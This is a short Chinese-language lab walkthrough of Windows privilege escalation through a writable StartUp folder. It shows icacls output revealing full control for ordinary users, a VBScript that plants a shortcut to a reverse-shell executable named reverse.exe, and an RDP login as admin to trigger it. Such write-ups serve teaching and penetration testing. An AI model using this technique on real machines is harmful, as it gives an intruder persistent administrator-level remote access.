查看 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
权限
C:\Users\user>icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp BUILTIN\Users:(OI)(CI)(F)
WIN-QBA94KB3IOF\Administrator:(I)(OI)(CI)(DE,DC)
WIN-QBA94KB3IOF\admin:(I)(OI)(CI)(DE,DC)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
Everyone:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
我们使用一个脚本在 StartUp
目录创建一个指向我们的可执行恶意文件的快捷方式
cscript C:\PrivEsc\CreateShortcut.vbs
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save
然后开启监听并使用 RDP 进行登录:
rdesktop -u admin 10.10.21.109